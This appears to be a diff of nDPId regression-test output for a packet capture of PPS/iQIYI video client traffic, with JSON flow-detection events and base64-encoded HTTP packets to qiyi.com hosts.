-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masflag.ini","code":0,"content_type":"","user_agent":"masflag_runxx"}} -01040{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1467353191505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":493,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":493,"pkt_l4_len":459,"thread_ts_msec":1467353191505,"pkt":"ABxCjnAxTF4M6gNlCABFAAHfpuJAADgGHVffGmoUwKhzCABQxk5hkIgmlBGBclAYAB+\/UwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogOTgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MTI6MTAgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjIwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbbWFzZmxhZ10NCnY9Mg0KcD00MA0KZT2xsb6pL8nPuqMNCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1467353191521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191521,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9RAAIAGTYzAqHMI3xpqFMZPAFCekgJEnvl6klAYQTcvHQAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2F1dG8uaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2F1dG9fcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masauto.ini","code":0,"content_type":"","user_agent":"masauto_runxx"}} 
-01086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1467353191524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191524,"pkt":"ABxCjnAxTF4M6gNlCABFAAIAVHFAADgGb6ffGmoUwKhzCABQxk+e+XqSnpIC1FAYAB\/e1QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjUwOjIzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4yMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2F1dG9dDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1467353191538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1467353191538,"pkt":"TF4M6gNlABxCjnAxCABFAAD6L9ZAAIAGlfnAqHMIJG7cD8ZNAFCivUMktEgQ8FAY\/\/DARAAAR0VUIC90bXBzdGF0cy5naWY\/bWV0aG9kPXFpdWJpdGVyJm9zPXdpbmRvd3MtNi4xLjc2MDFfc3AxJnV1aWQ9MzUwQzNGMUFDNzVENDBiYzkwRDYwMkRBNEU2N0E3MkQmc29mdHZlcnNpb249MS4wLjAuMSZzb3VyY2U9cHBzJnRhc2t0eXBlPWdldHRhc2tpbmZvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRSVlpQW5nZW50DQpIb3N0OiBtc2cudmlkZW8ucWl5aS5jb20NCg0K"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?method=qiubiter&os=windows-6.1.7601_sp1&uuid=350C3F1AC75D40bc90D602DA4E67A72D&softversion=1.0.0.1&source=pps&tasktype=gettaskinfo","code":0,"content_type":"","user_agent":"QIYiAngent"}} 
-00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1467353191556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191556,"pkt":"TF4M6gNlABxCjnAxCABFAAC5L9hAAIAGTYfAqHMI3xpqFMZPAFCekgLUnvl8alAYQMHSJwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc3JlY29tLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBtYXNhdXRvX3J1bnh4DQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1467353191604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191604,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L+lAAIAGTXjAqHMI3xpqE8ZQAFAEnujgm7SOJVAYQTfnOwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2Jsb2cuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2Jsb2dfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masblog.ini","code":0,"content_type":"","user_agent":"masblog_runxx"}} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191606,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5GMJAAC4G\/04kbtwPwKhzCABQxk20SBDwor1D9lAYPLgN5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
-01085{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1467353191608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191608,"pkt":"ABxCjnAxTF4M6gNlCABFAAIApFFAADgGH8jfGmoTwKhzCABQxlCbtI4lBJ7pcFAYAB996wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2Jsb2ddDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7440000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1467353191688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1467353191688,"pkt":"TF4M6gNlABxCjnAxCABFAAJOL\/RAAIAGZxbAqHMIZePIC8ZRAFCkQ4vBOJoXClAY\/\/Dn4QAAR0VUIC9jY3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IENvb2tpZUNsZWFyX3J1bnh4DQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25Kc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7440000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/ccs","code":0,"content_type":"","user_agent":"CookieClear_runxx"}} 
-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1467353191722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":291,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":291,"pkt_l4_len":257,"thread_ts_msec":1467353191722,"pkt":"ABxCjnAxTF4M6gNlCABFAAEVyyVAAC8GHh5l48gLwKhzCABQxlE4mhcKpEON51AYPCgsNwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2pzb247IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAxMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsiciI6ZmFsc2V9"} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1467353190235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190235,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPVAADMGJVLKbA7bwKhzCABQxHdtLPk6vNGSM1AYANYfVAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1467353190634,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353190634,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LnBAAIAGTvHAqHMI3xpqE8VMAFCjClS\/APxWfFAYQTf8ogAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL1FZQWdlbnQuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IFFZQWdlbnRfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/QYAgent.ini","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} +00940{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1467353190638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":420,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":420,"pkt_l4_len":386,"thread_ts_msec":1467353190638,"pkt":"ABxCjnAxTF4M6gNlCABFAAGWcOxAADgGU5ffGmoTwKhzCABQxUwA\/FZ8owpVT1AYAB8JQAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMjUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MzA6MDcgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjE5DQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbUVlBZ2VudF0NCnY9MA0KcD0xMDANCmU9"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7560000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1467353190892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1467353190892,"pkt":"TF4M6gNlABxCjnAxCABFAACVLoRAAIAGUpzAqHMIaibba8VNAFAdei0\/k1iI9FAYQTd0xwAAR0VUIC9jaXR5anNvbiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVlBZ2VudF9ydW54eA0KSG9zdDogaXBsb2NhdGlvbi5nZW8ucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7560000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"iplocation.geo.qiyi.com","url":"iplocation.geo.qiyi.com\/cityjson","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} 
+01043{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1467353190978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":497,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":497,"pkt_l4_len":463,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAHjK+5AADIGoeRqJttrwKhzCABQxU2TWIj0HXotrFAYAOXEmAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGNoYXJzZXQ9dXRmLTgNCg0KZjINCnZhciByZXR1cm5JcENpdHkgPXsiY29kZSI6IkEwMDAwMCIsICJkYXRhIjogeyJpcCI6IjExOC4xNjMuOC45MCIsICJpc3AiOiLkuK3ljY7nlLXkv6EiLCAiY291bnRyeSI6IuS4reWbveWkp+mZhiIsICJwcm92aW5jZSI6IuWPsOa5viIsICJjaXR5IjoiTm9uZSIsICJpc3BfaWQiOjY5LCAiY291bnRyeV9pZCI6NDgsICJwcm92aW5jZV9pZCI6MjI4LCAiY2l0eV9pZCI6MjI4MDAwLCAibG9jYXRpb25faWQiOjY5MjI4MDAwfX0KDQo="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1467353190978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":25,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAAtK+9AADIGo5lqJttrwKhzCABQxU2TWIqvHXotrFAYAOXCuQAAMA0KDQoA"} 
